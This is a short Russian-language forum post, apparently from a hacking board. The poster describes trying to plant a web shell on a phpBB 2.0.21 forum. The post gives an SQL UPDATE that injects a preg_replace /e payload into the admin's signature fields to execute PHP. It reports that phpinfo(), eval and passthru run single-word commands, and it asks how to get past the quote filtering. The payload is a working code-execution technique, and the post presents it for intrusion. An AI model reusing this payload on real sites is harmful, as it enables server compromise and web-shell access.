24.06.2009, 19:06
|
|
Новичок
Регистрация: 05.04.2008
Сообщений: 7
С нами:
9525635
Репутация:
1
|
|
Пытаюсь залить шелл на phpbb 2.0.21. Делаю апдейт бд через админку такого рода:
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2;
phpinfo() выводит без проблем, а так же любую команду через eval или passthru, но только состоящую из одного слова, так как не принимает кавычки. Тоесть, passthru(ls) работает, а passthru(ls -la) уже естествено нет. Пробовал обойти эту херню всякими бэк-слэшами, не помогает...
Может кто знает как это можно обойти? Может через char() или hex как это делается в мускл?
// Все нашол!
Последний раз редактировалось GettoLove; 25.06.2009 в 19:14..
|
|
|